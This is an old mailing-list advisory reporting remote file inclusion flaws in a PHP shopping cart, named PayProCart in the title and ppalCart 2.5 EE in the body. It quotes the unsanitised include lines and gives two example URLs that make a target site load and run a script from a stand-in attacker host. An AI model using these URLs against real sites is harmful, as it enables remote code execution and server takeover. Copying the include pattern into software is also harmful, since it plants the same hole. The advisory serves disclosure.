PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities Sep 10 2006 05:19PM
l0x3 hotmail com
+--------------------------------------------------------------------

+

+ ppalCart V(2.5 EE) Remote File Inclusion

+

+-------------------------------------------------------------------

+

+ Affected Software .: Software

+ Version .............: ppalCart 2.5 EE

+ Venedor ...........: http://www.profitcode.com

+ Class .............: Remote File Inclusion

+ Risk ..............: high (Remote File Execution)

+ Found by ..........: momo26

+ Writtin by ..........: Eddy_BAck0o - www.LEzr.com/vB

+ Contact ...........: http://www.lezr.com/vb/showthread.php?t=12673

+

+--------------------------------------------------------------------

+--------------------------------------------------------------------

+ ./index Directory ...

+ [index.php]

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+include $docroot . "js/css/shop-custom.php";

+include $docroot . "js/css/shop-default.php";

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+Line --> 50 - 349

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+else if($proMod) {

+include "$proMod" . ".php";

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+Line --> 288 - 349

+Ex --> http://www.victom.com/index.php?proMod=http://yourevil.com/r0x.txt?cmd

+

+-------------------------------------------------------------------

+-------------------------------------------------------------------

+ [mainpage.php]

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+include "$docroot" . "shopincs/commonincs/shop-mainbottom" . "$langFile" . ".php";

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+Line --> 158 - 308

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+include "$docroot" . "tplates/newitems.php";

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+Line --> 284 - 308

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+include "$docroot" . "tplates/specials.php";

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+Line --> 287 - 308

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+include "$docroot" . "cstmincs/cstmbanner$langFile.php";

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+Line --> 290 - 308

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+include "$docroot" . "tplates/upselladvert.php";

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+Line --> 292 - 308

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+include "$docroot" . "mainincs/upsellproducts.php";

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

+Line --> 298 - 308

+Ex --> http://www.victom.com/mainpage.php?docroot=http://yourevil.com/r0x.txt?c
md

+

+--------------------------------------------------------------------

+Eddy_BAck0o ;

+--------------------------------------------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus